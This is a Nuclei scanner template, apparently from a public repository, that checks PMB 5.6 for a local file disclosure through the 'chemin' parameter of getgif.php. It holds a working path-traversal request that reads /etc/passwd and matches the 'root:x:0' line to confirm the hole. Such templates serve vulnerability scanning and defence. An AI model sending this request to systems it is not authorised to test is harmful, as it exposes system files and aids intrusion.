nuclei-templates/vulnerabilities/other/pmb-local-file-disclosure.yaml

24 lines
488 B
YAML

id: pmb-local-file-disclosure
info:
name: PMB 5.6 - 'chemin' Local File Disclosure
author: dhiyaneshDk
severity: high
reference:
- https://www.exploit-db.com/exploits/49054
tags: lfi,pmb
requests:
- method: GET
path:
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root:x:0"